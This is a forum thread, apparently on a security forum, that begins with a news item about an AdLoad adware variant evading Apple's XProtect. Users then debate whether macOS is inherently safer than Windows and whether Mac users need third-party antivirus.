New AdLoad malware variant slips through Apple's XProtect defenses

New AdLoad malware variant slips through Apple's XProtect defenses
August 11, 2021
https://www.bleepingcomputer.com/ne...riant-slips-through-apples-xprotect-defenses/

SentinelLabs: Massive New AdLoad Campaign Goes Entirely Undetected By Apple’s XProtect

 

Like I said, XProtect and GateKeeper aren't nearly as good as Win Defender, from what I understood. So if you're serious about security, it's probably best to run a third party AV on the Mac, unless you are not that worried about malware of course.

 

I understand that macOS is still way safer than Windows anyway.

"The fact that hundreds of unique samples of a well-known adware variant have been circulating for at least 10 months and yet still remain undetected by Apple’s built-in malware scanner demonstrates the necessity of adding further endpoint security controls to Mac devices." op cit

I'll translate that:

"The fact that allegedly hundreds of unique samples of scary FUD have been circulating for at least 10 months and yet still remain undetected by Apple’s built-in malware scanner demonstrates the scary power of FUD to convince Mac users to spend their money on additional 3rd party security programs to make loads of money for those 3rd party distributors."

I'm still not buying into the corporate FUD machine.

 

No, macOS is not a safer OS than Windows, it's just that there is less malware available for it, because it's has a way smaller percentage when it comes to total users. If macOS was just as big as Windows, it would be more targeted. These type of articles simply remind people that they should still practice safe computing even on Mac computers. BTW, I have also never been infected by malware in 20+ years on Windows, with that I mean I have never lost any data or money.

 

Yes it is. Unix is inherently safer and better defended as a system. Safer, not impenetrable. I'm not buying the safety in smaller numbers rhetoric that's regularly bandied about. It's not that there isn't some truth to it, it's just that the argument has been turned on its head by the FUD brigade.

Apple have control over their own hardware in a way M$ doesn't. This also inevitably contributes to a safer system.

The question you have to ask is why are the FUD brigade propagating this argument?

The answer is fairly straightforward: FUD = money.

The next question you have to ask is who benefits from this money?

I have run Chrome OS, macOS and Ubuntu for years with nothing more than browser hardening.

With a subtext.

 

I'm afraid you are wrong, purely from a technical point of view, the macOS isn't safer than Windows. But it's true that most people on the macOS are probably downloading software form the Mac App Store, so this means they are less at risk of downloading malware. That's probably the key difference.

This is exactly what M$ is trying to achieve with the Windows Store, but people are just too used to downloading software from all kinds of download sites or directly from the vendor. But once you get malware running on a Mac, it's just as dangerous as on Windows, they can perform exactly the same activities, think of info stealers and ransomware.

 

I'm not wrong.

https://blog.ipswitch.com/unix-has-always-been-more-secure-than-windows

 

Are Macs more secure than PCs? Not always. Here’s why

https://www.pensar.co.uk/blog/are-macs-more-secure-than-pcs

 

Well, I guess we will have to agree to disagree, but just read the article that roger_m posted and here is another one that will hopefully make things much more clear.

https://www.sentinelone.com/blog/which-is-more-secure-windows-linux-or-macos/

Great article which explains things clearly. People who continue to say that Mac's are more secure after reading this, just don't get it.

 

It's definitely a 'grate' article lol. I'm still not buying the FUD. I just get that macOS is intrinsically more secure. I know it's difficult to de-brainwash yourself from the Windows mind-set. All I've ever needed on a Mac is browser hardening and common sense. There will always be the paranoid and the Mac haters with their own tendentious agendas and bigotries.

Unix isn't invulnerable but by its very design it is safer than anything Mickey offers. As I wasn't born yesterday, or even in the early hours of this morning, I'm just not buying the FUD propaganda. As for 'truth' Kaspersky wouldn't know veracity if it jumped up and bit them in the dongle. I've told you before, this is all to do with spondoolies (£££$$$) and inevitably separating the gullible and the paranoid from them.

It's a textbook example of how FUD works. Since Mickey has had to drastically improve its own bundled AV many security companies are now struggling economically. A direct consequence of this is a definite need to find new markets. Linux users as a whole don't tend to be taken in by the FUD and I've only ever spoken to one person online who uses an AV on Linux. Besides, I doubt Linux users would pay for third party security. Mac and Linux have the same BSD origin.

So what's the logical market to target? Chrome OS, like all Linux, doesn't really need an AV and Chrome OS has its own in-built security. That leaves Apple. As Apple products aren't cheap it makes sense for 'security companies' to target a perceived wealthier market demographic. The best way to prepare that market is to use FUD propaganda. The Mac haters will go along with this on principle as it justifies their own bigotry. Whether the third party security solution is vendor or freeware there will be some pay off for the distributors as they will harvest something from your computer. People are wising-up to the 'security game'.

I'm just not that gullible anymore. I've been AV-free for some years now.

 

@Daveski17 I really do not believe that macOS is more secure than Windows. In any case, Windows is more than secure enough for my needs and malware isn't something that I need to worry about, as for the most part, I never encounter any. While I do use antiviruses, I would have no problem using a Windows computer with no security software installed.

 

It isn't an ontological subjectivity, macOS, like all Unix, is more secure by design. Belief has little to do with it.

"This explains in far more detail than the rest of the article how UNIX/Linux is more secure than Windows.

To understand the world of UNIX, you have to understand that software development has been split into different branches. These branches sometimes develop into forks. Before I continue, I need to clarify one common misunderstanding: Apple chose to build on BSD (BSD Overview, 2013), which is nothing more than a fork of the BSD branch. MacOS = UNIX.

Project -> branch -> fork

UNIX -> BSD -> MacOS

UNIX -> Linux -> Red Hat, Ubuntu

Now that we got that out of the way, UNIX-based operating systems have always been more secure than Windows. My reasoning is simple: Windows exposes too many vital areas to potential problems. The biggest problem, in my opinion, is that the RPC (Remote Procedure Call) service is linked to every vital Windows service. In laymen's terms, the RPC allows remote control of your system; similar to if you have nothing but smart devices powering everything in your home from your doors & locks, all the way to the lights in your bedroom, the thermostat, and the alarm system. All a virus writer would have to do is hijack the RPC, and the virus writer has full control of the system. For the curious people, I included a full list of services (some of the services are particular to my PC, as every PC will have software that adds different background services).

In contrast, UNIX takes a modular approach. Think of it like LEGO blocks; you can add or remove pieces as you like, and you have the freedom to even sabotage your own creation. Instead of integrating everything into one environment, you can independently add/remove/fix separate items. For example, if your network component doesn't work, then you can still run the operating system and independently fix the network component. Likewise, if you suddenly can't display your graphics; then you can go into the console (text interface) and determine if it's the software for the graphics card, or if it's your GUI (graphic user interface - the thing that allows you to move your mouse and click instead of type a command in a terminal or console).

Additional note: Linux does have an RPC service, but it's only linked to the services that absolutely need it. In many cases, each program runs its own server as needed with its own username on the system. This is what makes UNIX/Linux far more secure than Windows.

The BSD fork is different from the Linux fork in that it's licensing doesn't require you to open source everything. That's why I suspect Apple chose the BSD format. It still has the same stability of the original OS, but the Linux community doesn't have the opportunity to rewrite it and distribute it legally."

~ op cit

UNIX Has Always Been More Secure Than Windows, Robert Yeckley 2020

 

Look it's true that IT security companies are obviously trying to make money, but that doesn't mean that it's any less true what they are saying. Fact of the matter is that purely from a technical point of view, the macOS isn't more safe. Like some people say, you are entitled to your own opinion, but not to your own facts.

It's a fact that protection systems in the macOS like XProtect and Gatekeeper can be bypassed, just like Windows Defender or any other AV can be bypassed. But first you need to encounter malware, and on the macOS it's less likely that you will. That doesn't mean it's more secure.

BTW, here is a good example, remember the attack on Coinbase employees? Hackers were using zero days bugs in Firefox to succesfully plant malware on the macOS, see first link. And the other links are also quite interesting, it's about how protection systems in the macOS were bypassed.

https://arstechnica.com/information...used-to-install-undetected-backdoors-on-macs/
https://www.wired.com/story/macos-malware-shlayer-gatekeeper-notarization/
https://www.wired.com/story/apple-approved-malware-macos-notarization-shlayer/

 

No, macOS, like all Unix, is inherently more secure therefore safer to use, as Robert Yeckley expounds in the article I quoted from. Unix systems, including macOS, have always been technically more secure than Windows. These are actual facts and not subjective fantasy. It doesn't really matter what the haters and the FUD brigade state.

Obviously no operating system is impenetrable and any OS can be compromised. Your argument is beginning to sound desperate and is losing its cogency. It's not just that there is less opportunity for Mac users to encounter malware but the system itself was never as vulnerable as Windows in the first place, primarily due to its modular design. Logically therefore Unix (macOS) is more secure than Windows ipso facto.

All these prove is that any system can have vulnerabilities. This isn't actually a surprise to anyone, including macOS users like myself. It's not just that security companies are trying to make money, after all, that's their whole raison d'etre. They've always been in the security business to make money. That's why businesses start. One of the reasons it was such a lucrative and necessary business in the first place was that Windows was the dominant OS in the market. Its excessive vulnerability to attack by malware compared to safer systems like Unix were realised from the outset. The inherent and copious security flaws in Windows have been known for many years and exploited by malware writers and security companies for their own respective gains. You have to look at the entire cultural milieu surrounding the recent need to target macOS users about malware awareness. As MS is losing market share gradually to Unix based systems (especially mobile devices) the need for security companies to diversify and adapt is paramount to their very survival. It's only natural and logical that they will look at other popular OS types to target. Android, Chrome OS and macOS are prime candidates for FUD and are actually an expanding market. However, most Linux distro users probably won't be convinced by the fear spread by security companies. So targeting the average Ubuntu user (also like myself) probably won't have much effect. Notwithstanding Linux is a small minority. At the end of the day, if macOS was as used in the same percentage as Windows is now, it would still be an inherently safer system by virtue of its design. Safer, not impervious to malware. I've no doubt there would be more imperative for Apple to make its in-built defences more secure, but I do doubt there would even be a need for third party security anti-virus programs at all. The very reason that these companies exist was originally due to the weaknesses and vulnerabilities of Windows to malware in the first place. Have you ever wondered why MS originally bundled MSE with Windows? It was a very capable AV, although Mickey played this down. It changed everything, especially for third party security companies. MS bundled MSE as Windows has always been intrinsically vulnerable. Usually and logically the horse goes in front of the cart, not behind it. You can also lead a horse to water. Getting it to accept FUD is a different thing altogether.

 

Well, I can say the same thing about you. I have posted numerous of articles that proof that macOS is not as secure as people may think, and you keep referring to the same article about Unix being more safe because of it modular design, something that most people don't care about, especially not the ones that get infected on their supposedly "super duper" secure macOS system.

Do you really think those Coinbase employees that got targeted on macOS via a couple of zero days in Firefox, and possibly lost money and data, care about the modular design of Unix? You can call it FUD but at the end of the day it's a fact that Gatekeeper and XProtect couldn't protect against malware like AdLoad, Shyler and NetWire.

Heck, even Apple admits the problem with malware on the macOS is becoming bigger, but guess what, even the Apple App Store isn't foolproof, one of the top downloads was actually spyware that was able to bypass the macOS "app sandboxing" restrictions LOL. But anyway, it's clear that we have a different point of view.

https://threatpost.com/apple-finally-boots-sneaky-adware-doctor-app-from-mac-app-store/137319/
https://www.cnbc.com/2021/05/19/app...t-level-of-mac-malware-is-not-acceptable.html

 

Yes exactly, at the end of the day it comes down to safe computing practices. I haven't even used an AV on Windows and didn't even patch it for 12 years. And then I'm talking about Windows XP which wasn't as secure as Win 8 and 10, and still no malware LOL. Yes I do install lots of security tools, first of all because it's a whole lot of fun but also because I'm not taking any chances, you never know when you might encounter malware.

 

You have no proof of anything. I have never stated that macOS was invulnerable. I've been using Unix for years without an AV, I wouldn't do that with Windows. Why do you think this is? Perhaps the Coinbase employees should have used a safer browser than Firefox?

You seem to be obsessed with proclaiming that macOS isn't as safe as Windows. This seems more like weird cognitive dissonance than anything in actual reality. The fact is macOS is safer by design than anything MS.

Pretty soon I'm buying another Mac. I won't put an AV on it. Why? Because it is safer than Windows by design.

 

I never said that you claimed that the macOS was invulnerable. My point is, that it's much more important to remind people of this fact, instead of dismissing this as FUD. I'm not sure what you mean with "no proof", but the links that I posted are all based on actual events. So even if by design macOS is more secure, it doesn't matter since just like on Windows, those security tools can be bypassed. And blaming Firefox is a bit too easy, I'm sure that if you look long enough you will also find holes in Safari.

No, I never said that, where did you read this? I'm saying that all of the links that I posted proof that macOS isn't as safe as presumed. It's you that seem to be obsessed in saying that the macOS is way more secure than Windows because of its design.

And don't forget that security in the Windows OS has been improved considerably in the last 10 years, think of PatchGuard, AppContainer, Windows Defender and MS Smartscreen. You can even configure Win 10 in a way that it will only download apps from the Windows Store.

And browser exploits are mostly a thing of the past now that Chromium based browsers and Firefox have implemented sandboxing. Plus ad-blockers will block most malvertising attacks. In other words, it's just as easy to stay safe on Windows as it is on the macOS, even if the amount of malware that you may encounter is way bigger.

 

Safari has always had known vulnerabilities. Although with recent 'walled garden' policies it may be safer it's also less customisable.



A good adblocker is always useful. Although you may have to pay for one.

Isn't as safe as presumed? Presumed by whom? This is the very crux of the FUD propaganda. It doesn't change the fact that macOS is actually safer by design. It is 'way' more secure than Windows.

Yes, security application programs, especially AV's, were actually created because of the original vulnerability of Windows compared to Unix. Windows needs the security implementation far more than Unix.

Keep telling yourself that Windows is as safe as macOS and it might even become true. In a parallel universe! lol

 

By most people? It might lead them to believe that macOS is immune to malware, a dangerous thing to believe. But anyway, like I said, let us agree to disagree. But I do have to say that I sometimes wonder why on earth operating systems like Windows have so many API's that can be abused. Most of these API's aren't even used by legitimate software, but make life for malware a lot easier.

But I have been studying malware for the macOS, and guess what, they have got the exact same capabilities. Although macOS does apply sandboxing to apps, something that M$ also tried with AppContainer, but most apps don't make use it, because they need to be redesigned. BTW, another interesting OS that applies sandboxing is the Qubes OS, it's considered to be the safest OS and is based on Linux.

https://www.wired.com/2014/11/protection-from-hackers/
https://en.wikipedia.org/wiki/Qubes_OS

 

Apple themselves were probably partly responsible for creating some of the mythology. Not unlike Google when they advertise Chrome OS as being so safe it doesn't need an AV. Although I'm pretty sure it doesn't. But Windows was irresponsibly vulnerable from the outset. Unix wasn't, that's the difference and my whole point. I think if you've used MS for a length of time you develop a particular (and necessary) security mindset. After all, that's why security forums like this one exist in the first place. To be honest, after a while, I was more concerned that an AV would tank my computer with false positives than getting actual malware. Eventually I ditched Windows. I've been running Ubuntu for some years without an AV (with some browser hardening) so the transition to macOS with no AV was relatively normal. I think Windows did a lot to make computers what they are today, but there's been a price.

I've read a bit about Qubes, but I doubt it will convince me to swap Ubuntu for it.

 

Well, that's actually how I ended up on this forum, because around 2004 browser exploits were becoming a big problem. And then I got hooked on computer security, it became a hobby. Eventually I stopped using AV's because they became bloated and privacy invasive and I switched to HIPS and anti-executable and of course I did scan files via VirusTotal. But the most important thing is to simply download files only from trusted sources, it's not like hackers can use magic to implant malware on your system no what I mean?

And the question is how it works in real life. Bromium (which was bought by HP) came up with micro virtualization, very secure but certain people said it was just too slow and probably it's overkill.

 

On my old Belnea notebook with 1Gb of RAM I was a bit limited with AV's. I tried the Panda Cloud when it was first available. With the initial scan it showed false positives. Vista was a bloated OS and had many problems so this was just one problem out of many. It basically soured me to Mickey$oft. Although MSE was actually pretty decent. I admit Win 7 was a lot better but after a while I realised that the problem wasn't with AV's or security programs but with the operating system itself. Windows was never as good, as light as, or as safe as Unix. After Mickey seriously and purposely screwed the updating with Win 7 I realised I had two realistic options: Ubuntu and macOS.

I honestly don't believe I need anything other than Ubuntu and browser hardening.

 

Yes, I can understand that if you had a couple of bad experiences that you decided that you were done with Windows. But even though it's not perfect, I still think Windows is a pretty good OS. BTW, I do think that macOS overall has less attack vectors inside the OS, so if you look at this in this way, it's indeed safer.

However, as said before it's not immune for threats, so if you can get malware up and running, you're still at risk from info-stealers and ransomware for example. That's basically what I mean when I say that macOS isn't more secure than Windows. To give an example, here is an article about code injection methods in the macOS. I couldn't download the report since they don't accept email addresses from Yahoo Mail and Gmail.

https://www.deepinstinct.com/2019/04/29/remote-code-injections-in-mac-os/

 

Win 7 wasn't bad, but it's the only MS OS I've ever liked (tolerated). I actually ran Unix before I ever used Windows and to be honest I always thought I was 'slumming' it with Windows for years. Like I've said before, it's not that macOS (or any Unix) isn't invulnerable, it's just that it's intrinsically safer. Obviously it will always be a case of de gustibus non est disputandum. But I vastly prefer Unix to Windows for a variety of reasons, security is only one reason (although a major one). Ubuntu is actually my favourite OS but macOS is a close second.